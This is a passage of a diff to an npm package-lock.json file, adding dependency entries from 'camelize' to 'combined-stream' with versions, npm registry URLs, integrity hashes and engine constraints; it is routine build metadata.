"https://registry.npmjs.org/camelize/-/camelize-1.0.0.tgz", + "integrity": "sha1-FkpUg+Yw+kMh5a8HAg5TGDGyYJs=" + }, + "node_modules/caniuse-api": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/caniuse-api/-/caniuse-api-3.0.0.tgz", + "integrity": "sha512-bsTwuIg/BZZK/vreVTYYbSWoe2F+71P7K5QGEX+pT250DZbfU1MQ5prOKpPR+LL6uWKK3KMwMCAS74QB3Um1uw==", + "dev": true, + "dependencies": { + "browserslist": "^4.0.0", + "caniuse-lite": "^1.0.0", + "lodash.memoize": "^4.1.2", + "lodash.uniq": "^4.5.0" + } + }, + "node_modules/caniuse-lite": { + "version": "1.0.30001667", + "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001667.tgz", + "integrity": "sha512-7LTwJjcRkzKFmtqGsibMeuXmvFDfZq/nzIjnmgCGzKKRVzjD72selLDK1oPF/Oxzmt4fNcPvTDvGqSDG4tCALw==", + "dev": true, + "funding": [ + { + "type": "opencollective", + "url": "https://opencollective.com/browserslist" + }, + { + "type": "tidelift", + "url": "https://tidelift.com/funding/github/npm/caniuse-lite" + }, + { + "type": "github", + "url": "https://github.com/sponsors/ai" + } + ] + }, + "node_modules/canvas": { + "version": "2.11.2", + "resolved": "https://registry.npmjs.org/canvas/-/canvas-2.11.2.tgz", + "integrity": "sha512-ItanGBMrmRV7Py2Z+Xhs7cT+FNt5K0vPL4p9EZ/UX/Mu7hFbkxSjKF2KVtPwX7UYWp7dRKnrTvReflgrItJbdw==", + "dev": true, + "hasInstallScript": true, + "optional": true, + "peer": true, + "dependencies": { + "@mapbox/node-pre-gyp": "^1.0.0", + "nan": "^2.17.0", + 
"simple-get": "^3.0.3" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/case-sensitive-paths-webpack-plugin": { + "version": "2.4.0", + "resolved": "https://registry.npmjs.org/case-sensitive-paths-webpack-plugin/-/case-sensitive-paths-webpack-plugin-2.4.0.tgz", + "integrity": "sha512-roIFONhcxog0JSSWbvVAh3OocukmSgpqOH6YpMkCvav/ySIV3JKg4Dc8vYtQjYi/UxpNE36r/9v+VqTQqgkYmw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=4" + } + }, + "node_modules/caseless": { + "version": "0.12.0", + "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", + "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" + }, + "node_modules/catharsis": { + "version": "0.9.0", + "resolved": "https://registry.npmjs.org/catharsis/-/catharsis-0.9.0.tgz", + "integrity": "sha512-prMTQVpcns/tzFgFVkVp6ak6RykZyWb3gu8ckUpd6YkTlacOd3DXGJjIpD4Q6zJirizvaiAjSSHlOsA+6sNh2A==", + "dependencies": { + "lodash": "^4.17.15" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/celebrate": { + "version": "15.0.3", + "resolved": "https://registry.npmjs.org/celebrate/-/celebrate-15.0.3.tgz", + "integrity": "sha512-ToF8ILq/F0KhQ0CPtexP7Cu9GkqKJ91VKy3ZOCV24aaNWdm3QCHqnXAKfKHrtcM2B2zmPFe11p8WWsQkmq8k4g==", + "dependencies": { + "escape-html": "1.0.3", + "joi": "17.x.x", + "lodash": "4.17.x" + } + }, + "node_modules/chai": { + "version": "4.3.6", + "resolved": "https://registry.npmjs.org/chai/-/chai-4.3.6.tgz", + "integrity": "sha512-bbcp3YfHCUzMOvKqsztczerVgBKSsEijCySNlHHbX3VG1nskvqjz5Rfso1gGwD6w6oOV3eI60pKuMOV5MV7p3Q==", + "dev": true, + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.2", + "deep-eql": "^3.0.1", + "get-func-name": "^2.0.0", + "loupe": "^2.3.1", + "pathval": "^1.1.1", + "type-detect": "^4.0.5" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/chai-as-promised": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/chai-as-promised/-/chai-as-promised-7.1.1.tgz", + "integrity": "sha512-azL6xMoi+uxu6z4rhWQ1jbdUhOMhis2PvscD/xjLqNMkv3BPPp2JyyuTHOrf9BOosGpNQ11v6BKv/g57RXbiaA==", + "dev": true, + "dependencies": { + "check-error": "^1.0.2" + }, + "peerDependencies": { + "chai": ">= 2.1.2 < 5" + } + }, + "node_modules/chai-exclude": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/chai-exclude/-/chai-exclude-2.1.0.tgz", + "integrity": "sha512-IBnm50Mvl3O1YhPpTgbU8MK0Gw7NHcb18WT2TxGdPKOMtdtZVKLHmQwdvOF7mTlHVQStbXuZKFwkevFtbHjpVg==", + "dev": true, + "dependencies": { + "fclone": "^1.0.11" + }, + "peerDependencies": { + "chai": ">= 4.0.0 < 5" + } + }, + "node_modules/chai-http": { + "version": "4.4.0", + "resolved": "https://registry.npmjs.org/chai-http/-/chai-http-4.4.0.tgz", + "integrity": "sha512-uswN3rZpawlRaa5NiDUHcDZ3v2dw5QgLyAwnQ2tnVNuP7CwIsOFuYJ0xR1WiR7ymD4roBnJIzOUep7w9jQMFJA==", + "dev": true, + "dependencies": { + "@types/chai": "4", + "@types/superagent": "4.1.13", + "charset": "^1.0.1", + "cookiejar": "^2.1.4", + "is-ip": "^2.0.0", + "methods": "^1.1.2", + "qs": "^6.11.2", + "superagent": "^8.0.9" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/chai-http/node_modules/debug": { + "version": "4.3.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", + "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", + "dev": true, + "dependencies": { + "ms": "2.1.2" + }, + "engines": { + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } + } + }, + 
"node_modules/chai-http/node_modules/formidable": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/formidable/-/formidable-2.1.2.tgz", + "integrity": "sha512-CM3GuJ57US06mlpQ47YcunuUZ9jpm8Vx+P2CGt2j7HpgkKZO/DJYQ0Bobim8G6PFQmK5lOqOOdUXboU+h73A4g==", + "dev": true, + "dependencies": { + "dezalgo": "^1.0.4", + "hexoid": "^1.0.0", + "once": "^1.4.0", + "qs": "^6.11.0" + }, + "funding": { + "url": "https://ko-fi.com/tunnckoCore/commissions" + } + }, + "node_modules/chai-http/node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dev": true, + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/chai-http/node_modules/ms": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", + "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", + "dev": true + }, + "node_modules/chai-http/node_modules/semver": { + "version": "7.5.4", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", + "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", + "dev": true, + "dependencies": { + "lru-cache": "^6.0.0" + }, + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/chai-http/node_modules/superagent": { + "version": "8.1.2", + "resolved": "https://registry.npmjs.org/superagent/-/superagent-8.1.2.tgz", + "integrity": "sha512-6WTxW1EB6yCxV5VFOIPQruWGHqc3yI7hEmZK6h+pyk69Lk/Ut7rLUY6W/ONF2MjBuGjvmMiIpsrVJ2vjrHlslA==", + "dev": true, + "dependencies": { + "component-emitter": "^1.3.0", + "cookiejar": "^2.1.4", + "debug": "^4.3.4", + "fast-safe-stringify": "^2.1.1", + "form-data": "^4.0.0", + "formidable": "^2.1.2", + "methods": "^1.1.2", + "mime": "2.6.0", + "qs": "^6.11.0", + "semver": "^7.3.8" + }, + "engines": { + "node": ">=6.4.0 <13 || >=14" + } + }, + "node_modules/chai-http/node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", + "dev": true + }, + "node_modules/chalk": { + "version": "2.4.2", + "resolved": "https://registry.npmjs.org/chalk/-/chalk-2.4.2.tgz", + "integrity": "sha512-Mti+f9lpJNcwF4tWV8/OrTTtF1gZi+f8FqlyAdouralcFWFQWF2+NgCHShjkCb+IFBLq9buZwE1xckQU4peSuQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^3.2.1", + "escape-string-regexp": "^1.0.5", + "supports-color": "^5.3.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/chalk/node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha1-G2HAViGQqN/2rjuyzwIAyhMLhtQ=", + "dev": true, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/chalk/node_modules/has-flag": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/has-flag/-/has-flag-3.0.0.tgz", + "integrity": "sha1-tdRU3CGZriJWmfNGfloH87lVuv0=", + "dev": true, + "engines": { + "node": ">=4" + } + }, + "node_modules/chalk/node_modules/supports-color": { + "version": "5.5.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", + "integrity": 
"sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", + "dev": true, + "dependencies": { + "has-flag": "^3.0.0" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/character-entities": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/character-entities/-/character-entities-2.0.2.tgz", + "integrity": "sha512-shx7oQ0Awen/BRIdkjkvz54PnEEI/EjwXDSIZp86/KKdbafHh1Df/RYGBhn4hbe2+uKC9FnT5UCEdyPz3ai9hQ==", + "dev": true, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/wooorm" + } + }, + "node_modules/character-parser": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/character-parser/-/character-parser-2.2.0.tgz", + "integrity": "sha1-x84o821LzZdE5f/CxfzeHHMmH8A=", + "dependencies": { + "is-regex": "^1.0.3" + } + }, + "node_modules/charset": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/charset/-/charset-1.0.1.tgz", + "integrity": "sha512-6dVyOOYjpfFcL1Y4qChrAoQLRHvj2ziyhcm0QJlhOcAhykL/k1kTUPbeo+87MNRTRdk2OIIsIXbuF3x2wi5EXg==", + "dev": true, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/chart.js": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/chart.js/-/chart.js-4.0.1.tgz", + "integrity": "sha512-5/8/9eBivwBZK81mKvmIwTb2Pmw4D/5h1RK9fBWZLLZ8mCJ+kfYNmV9rMrGoa5Hgy2/wVDBMLSUDudul2/9ihA==", + "dev": true, + "engines": { + "pnpm": "^7.0.0" + } + }, + "node_modules/chartjs-adapter-moment": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/chartjs-adapter-moment/-/chartjs-adapter-moment-1.0.1.tgz", + "integrity": "sha512-Uz+nTX/GxocuqXpGylxK19YG4R3OSVf8326D+HwSTsNw1LgzyIGRo+Qujwro1wy6X+soNSnfj5t2vZ+r6EaDmA==", + "dev": true, + "peerDependencies": { + "chart.js": ">=3.0.0", + "moment": "^2.10.2" + } + }, + "node_modules/chartjs-plugin-datalabels": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/chartjs-plugin-datalabels/-/chartjs-plugin-datalabels-2.2.0.tgz", + "integrity": "sha512-14ZU30lH7n89oq+A4bWaJPnAG8a7ZTk7dKf48YAzMvJjQtjrgg5Dpk9f+LbjCF6bpx3RAGTeL13IXpKQYyRvlw==", + "dev": true, + "peerDependencies": { + "chart.js": ">=3.0.0" + } + }, + "node_modules/check-error": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/check-error/-/check-error-1.0.3.tgz", + "integrity": "sha512-iKEoDYaRmd1mxM90a2OEfWhjsjPpYPuQ+lMYsoxB126+t8fw7ySEO48nmDg5COTjxDI65/Y2OWpeEHk3ZOe8zg==", + "dev": true, + "dependencies": { + "get-func-name": "^2.0.2" + }, + "engines": { + "node": "*" + } + }, + "node_modules/check-more-types": { + "version": "2.24.0", + "resolved": "https://registry.npmjs.org/check-more-types/-/check-more-types-2.24.0.tgz", + "integrity": "sha1-FCD/sQ/URNz8ebQ4kbv//TKoRgA=", + "dev": true, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/check-types": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/check-types/-/check-types-5.1.0.tgz", + "integrity": "sha1-NzlN07YEKlEVXpJsOpF1PUmeXcg=" + }, + "node_modules/cheerio": { + "version": "1.0.0-rc.10", + "resolved": "https://registry.npmjs.org/cheerio/-/cheerio-1.0.0-rc.10.tgz", + "integrity": "sha512-g0J0q/O6mW8z5zxQ3A8E8J1hUgp4SMOvEoW/x84OwyHKe/Zccz83PVT4y5Crcr530FV6NgmKI1qvGTKVl9XXVw==", + "dev": true, + "dependencies": { + "cheerio-select": "^1.5.0", + "dom-serializer": "^1.3.2", + "domhandler": "^4.2.0", + "htmlparser2": "^6.1.0", + "parse5": "^6.0.1", + "parse5-htmlparser2-tree-adapter": "^6.0.1", + "tslib": "^2.2.0" + }, + "engines": { + "node": ">= 6" + }, + "funding": { + "url": 
"https://github.com/cheeriojs/cheerio?sponsor=1" + } + }, + "node_modules/cheerio-select": { + "version": "1.5.0", + "resolved": "https://registry.npmjs.org/cheerio-select/-/cheerio-select-1.5.0.tgz", + "integrity": "sha512-qocaHPv5ypefh6YNxvnbABM07KMxExbtbfuJoIie3iZXX1ERwYmJcIiRrr9H05ucQP1k28dav8rpdDgjQd8drg==", + "dev": true, + "dependencies": { + "css-select": "^4.1.3", + "css-what": "^5.0.1", + "domelementtype": "^2.2.0", + "domhandler": "^4.2.0", + "domutils": "^2.7.0" + }, + "funding": { + "url": "https://github.com/sponsors/fb55" + } + }, + "node_modules/chokidar": { + "version": "3.6.0", + "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz", + "integrity": "sha512-7VT13fmjotKpGipCW9JEQAusEPE+Ei8nl6/g4FBAmIm0GOOLMua9NDDo/DWp0ZAxCr3cPq5ZpBqmPAQgDda2Pw==", + "dev": true, + "license": "MIT", + "dependencies": { + "anymatch": "~3.1.2", + "braces": "~3.0.2", + "glob-parent": "~5.1.2", + "is-binary-path": "~2.1.0", + "is-glob": "~4.0.1", + "normalize-path": "~3.0.0", + "readdirp": "~3.6.0" + }, + "engines": { + "node": ">= 8.10.0" + }, + "funding": { + "url": "https://paulmillr.com/funding/" + }, + "optionalDependencies": { + "fsevents": "~2.3.2" + } + }, + "node_modules/chownr": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/chownr/-/chownr-1.1.4.tgz", + "integrity": "sha512-jJ0bqzaylmJtVnNgzTeSOs8DPavpbYgEr/b0YL8/2GO3xJEhInFmhKMUnEJQjZumK7KXGFhUy89PrsJWlakBVg==" + }, + "node_modules/chrome-trace-event": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/chrome-trace-event/-/chrome-trace-event-1.0.3.tgz", + "integrity": "sha512-p3KULyQg4S7NIHixdwbGX+nFHkoBiA4YQmyWtjb8XngSKV124nJmRysgAeujbUVb15vh+RvFUfCPqU7rXk+hZg==", + "dev": true, + "engines": { + "node": ">=6.0" + } + }, + "node_modules/ci-info": { + "version": "3.9.0", + "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", + "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/sibiraj-s" + } + ], + "engines": { + "node": ">=8" + } + }, + "node_modules/citty": { + "version": "0.1.6", + "resolved": "https://registry.npmjs.org/citty/-/citty-0.1.6.tgz", + "integrity": "sha512-tskPPKEs8D2KPafUypv2gxwJP8h/OaJmC82QQGGDQcHvXX43xF2VDACcJVmZ0EuSxkpO9Kc4MlrA3q0+FG58AQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "consola": "^3.2.3" + } + }, + "node_modules/cjs-module-lexer": { + "version": "1.2.3", + "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.2.3.tgz", + "integrity": "sha512-0TNiGstbQmCFwt4akjjBg5pLRTSyj/PkWQ1ZoO2zntmg9yLqSRxwEa4iCfQLGjqhiqBfOJa7W/E8wfGrTDmlZQ==" + }, + "node_modules/class-utils": { + "version": "0.3.6", + "resolved": "https://registry.npmjs.org/class-utils/-/class-utils-0.3.6.tgz", + "integrity": "sha512-qOhPa/Fj7s6TY8H8esGu5QNpMMQxz79h+urzrNYN6mn+9BnxlDGf5QZ+XeCDsxSjPqsSR56XOZOJmpeurnLMeg==", + "dev": true, + "dependencies": { + "arr-union": "^3.1.0", + "define-property": "^0.2.5", + "isobject": "^3.0.0", + "static-extend": "^0.1.1" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/class-utils/node_modules/define-property": { + "version": "0.2.5", + "resolved": "https://registry.npmjs.org/define-property/-/define-property-0.2.5.tgz", + "integrity": "sha512-Rr7ADjQZenceVOAKop6ALkkRAmH1A4Gx9hV/7ZujPUN2rkATqFO0JZLZInbAjpZYoJ1gUx8MRMQVkYemcbMSTA==", + "dev": true, + "dependencies": { + "is-descriptor": "^0.1.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + 
"node_modules/class-utils/node_modules/is-descriptor": { + "version": "0.1.7", + "resolved": "https://registry.npmjs.org/is-descriptor/-/is-descriptor-0.1.7.tgz", + "integrity": "sha512-C3grZTvObeN1xud4cRWl366OMXZTj0+HGyk4hvfpx4ZHt1Pb60ANSXqCK7pdOTeUQpRzECBSTphqvD7U+l22Eg==", + "dev": true, + "dependencies": { + "is-accessor-descriptor": "^1.0.1", + "is-data-descriptor": "^1.0.1" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/classnames": { + "version": "2.5.1", + "resolved": "https://registry.npmjs.org/classnames/-/classnames-2.5.1.tgz", + "integrity": "sha512-saHYOzhIQs6wy2sVxTM6bUDsQO4F50V9RQ22qBpEdCW+I+/Wmke2HOl6lS6dTpdxVhb88/I6+Hs+438c3lfUow==", + "dev": true + }, + "node_modules/clean-css": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/clean-css/-/clean-css-5.3.0.tgz", + "integrity": "sha512-YYuuxv4H/iNb1Z/5IbMRoxgrzjWGhOEFfd+groZ5dMCVkpENiMZmwspdrzBo9286JjM1gZJPAyL7ZIdzuvu2AQ==", + "dev": true, + "dependencies": { + "source-map": "~0.6.0" + }, + "engines": { + "node": ">= 10.0" + } + }, + "node_modules/clean-git-ref": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/clean-git-ref/-/clean-git-ref-2.0.1.tgz", + "integrity": "sha512-bLSptAy2P0s6hU4PzuIMKmMJJSE6gLXGH1cntDu7bWJUksvuM+7ReOK61mozULErYvP6a15rnYl0zFDef+pyPw==", + "dev": true, + "license": "Apache-2.0" + }, + "node_modules/clean-regexp": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/clean-regexp/-/clean-regexp-1.0.0.tgz", + "integrity": "sha512-GfisEZEJvzKrmGWkvfhgzcz/BllN1USeqD2V6tg14OAOgaCD2Z/PUEuxnAZ/nPvmaHRG7a8y77p1T/IRQ4D1Hw==", + "dev": true, + "dependencies": { + "escape-string-regexp": "^1.0.5" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/clean-regexp/node_modules/escape-string-regexp": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-1.0.5.tgz", + "integrity": "sha512-vbRorB5FUQWvla16U8R/qgaFIya2qGzwDrNmCZuYKrbdSUMG6I1ZCGQRefkRVhuOkIGVne7BQ35DSfo1qvJqFg==", + "dev": true, + "engines": { + "node": ">=0.8.0" + } + }, + "node_modules/clean-stack": { + "version": "2.2.0", + "resolved": "https://registry.npmjs.org/clean-stack/-/clean-stack-2.2.0.tgz", + "integrity": "sha512-4diC9HaTE+KRAMWhDhrGOECgWZxoevMc5TlkObMqNSsVU62PYzXZ/SMTjzyGAFF1YusgxGcSWTEXBhp0CPwQ1A==", + "engines": { + "node": ">=6" + } + }, + "node_modules/cli-color": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/cli-color/-/cli-color-2.0.3.tgz", + "integrity": "sha512-OkoZnxyC4ERN3zLzZaY9Emb7f/MhBOIpePv0Ycok0fJYT+Ouo00UBEIwsVsr0yoow++n5YWlSUgST9GKhNHiRQ==", + "dev": true, + "dependencies": { + "d": "^1.0.1", + "es5-ext": "^0.10.61", + "es6-iterator": "^2.0.3", + "memoizee": "^0.4.15", + "timers-ext": "^0.1.7" + }, + "engines": { + "node": ">=0.10" + } + }, + "node_modules/cli-cursor": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/cli-cursor/-/cli-cursor-3.1.0.tgz", + "integrity": "sha512-I/zHAwsKf9FqGoXM4WWRACob9+SNukZTd94DWF57E4toouRulbCxcUh6RKUEOQlYTHJnzkPMySvPNaaSLNfLZw==", + "dev": true, + "dependencies": { + "restore-cursor": "^3.1.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cli-table3": { + "version": "0.6.1", + "resolved": "https://registry.npmjs.org/cli-table3/-/cli-table3-0.6.1.tgz", + "integrity": "sha512-w0q/enDHhPLq44ovMGdQeeDLvwxwavsJX7oQGYt/LrBlYsyaxyDnp6z3QzFut/6kLLKnlcUVJLrpB7KBfgG/RA==", + "dev": true, + "dependencies": { + "string-width": "^4.2.0" + }, + "engines": { + "node": "10.* || >= 12.*" + }, + "optionalDependencies": { + 
"colors": "1.4.0" + } + }, + "node_modules/cli-truncate": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/cli-truncate/-/cli-truncate-2.1.0.tgz", + "integrity": "sha512-n8fOixwDD6b/ObinzTrp1ZKFzbgvKZvuz/TvejnLn1aQfC6r52XEx85FmuC+3HI+JM7coBRXUvNqEU2PHVrHpg==", + "dev": true, + "dependencies": { + "slice-ansi": "^3.0.0", + "string-width": "^4.2.0" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/cli-truncate/node_modules/ansi-styles": { + "version": "4.3.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", + "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", + "dev": true, + "dependencies": { + "color-convert": "^2.0.1" + }, + "engines": { + "node": ">=8" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/cli-truncate/node_modules/slice-ansi": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/slice-ansi/-/slice-ansi-3.0.0.tgz", + "integrity": "sha512-pSyv7bSTC7ig9Dcgbw9AuRNUb5k5V6oDudjZoMBSr13qpLBG7tB+zgCkARjq7xIUgdz5P1Qe8u+rSGdouOOIyQ==", + "dev": true, + "dependencies": { + "ansi-styles": "^4.0.0", + "astral-regex": "^2.0.0", + "is-fullwidth-code-point": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/cliui": { + "version": "7.0.4", + "resolved": "https://registry.npmjs.org/cliui/-/cliui-7.0.4.tgz", + "integrity": "sha512-OcRE68cOsVMXp1Yvonl/fzkQOyjLSu/8bhPDfQt0e0/Eb283TKP20Fs2MqoPsr9SwA595rRCA+QMzYc9nBP+JQ==", + "dev": true, + "dependencies": { + "string-width": "^4.2.0", + "strip-ansi": "^6.0.0", + "wrap-ansi": "^7.0.0" + } + }, + "node_modules/clone": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/clone/-/clone-2.1.2.tgz", + "integrity": "sha512-3Pe/CF1Nn94hyhIYpjtiLhdCoEoz0DqQ+988E9gmeEdQZlojxnOb74wctFyuwWQHzqyf9X7C7MG8juUpqBJT8w==", + "dev": true, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/clone-deep": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/clone-deep/-/clone-deep-4.0.1.tgz", + "integrity": "sha512-neHB9xuzh/wk0dIHweyAXv2aPGZIVk3pLMe+/RNzINf17fe0OG96QroktYAUm7SM1PBnzTabaLboqqxDyMU+SQ==", + "dev": true, + "dependencies": { + "is-plain-object": "^2.0.4", + "kind-of": "^6.0.2", + "shallow-clone": "^3.0.0" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/clone-stats": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/clone-stats/-/clone-stats-1.0.0.tgz", + "integrity": "sha512-au6ydSpg6nsrigcZ4m8Bc9hxjeW+GJ8xh5G3BJCMt4WXe1H10UNaVOamqQTmrx1kjVuxAHIQSNU6hY4Nsn9/ag==", + "dev": true + }, + "node_modules/cluster": { + "version": "0.7.7", + "resolved": "https://registry.npmjs.org/cluster/-/cluster-0.7.7.tgz", + "integrity": "sha1-5JfiZ8yVa9CwUTrbSqOTNX0Ahe8=", + "dependencies": { + "log": ">= 1.2.0", + "mkdirp": ">= 0.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/cluster-key-slot": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/cluster-key-slot/-/cluster-key-slot-1.1.0.tgz", + "integrity": "sha512-2Nii8p3RwAPiFwsnZvukotvow2rIHM+yQ6ZcBXGHdniadkYGZYiGmkHJIbZPIV9nfv7m/U1IPMVVcAhoWFeklw==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/collection-visit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/collection-visit/-/collection-visit-1.0.0.tgz", + "integrity": "sha512-lNkKvzEeMBBjUGHZ+q6z9pSJla0KWAQPvtzhEV9+iGyQYG+pBpl7xKDhxoNSOZH2hhv0v5k0y2yAM4o4SjoSkw==", + 
"dev": true, + "dependencies": { + "map-visit": "^1.0.0", + "object-visit": "^1.0.0" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/color-convert": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", + "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", + "dependencies": { + "color-name": "~1.1.4" + }, + "engines": { + "node": ">=7.0.0" + } + }, + "node_modules/color-name": { + "version": "1.1.4", + "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", + "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" + }, + "node_modules/color-support": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/color-support/-/color-support-1.1.3.tgz", + "integrity": "sha512-qiBjkpbMLO/HL68y+lh4q0/O1MZFj2RX6X/KmMa3+gJD3z+WwI1ZzDHysvqHGS3mP6mznPckpXmw1nI9cJjyRg==", + "bin": { + "color-support": "bin.js" + } + }, + "node_modules/colord": { + "version": "2.9.3", + "resolved": "https://registry.npmjs.org/colord/-/colord-2.9.3.tgz", + "integrity": "sha512-jeC1axXpnb0/2nn/Y1LPuLdgXBLH7aDcHu4KEKfqw3CUhX7ZpfBSlPKyqXE6btIgEzfWtrX3/tyBCaCvXvMkOw==", + "dev": true + }, + "node_modules/colorette": { + "version": "2.0.19", + "resolved": "https://registry.npmjs.org/colorette/-/colorette-2.0.19.tgz", + "integrity": "sha512-3tlv/dIP7FWvj3BsbHrGLJ6l/oKh1O3TcgBqMn+yyCagOxc23fyzDS6HypQbgxWbkpDnf52p1LuR4eWDQ/K9WQ==" + }, + "node_modules/colors": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/colors/-/colors-1.4.0.tgz", + "integrity": "sha512-a+UqTh4kgZg/SlGvfbzDHpgRu7AAQOmmqRHJnxhRZICKFUT91brVhNNt58CMWU9PsBbv3PDCZUHbVxuDiH2mtA==", + "dev": true, + "engines": { + "node": ">=0.1.90" + } + }, + "node_modules/combined-stream": { + "version": "1.0.8", + "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", + "integrity": 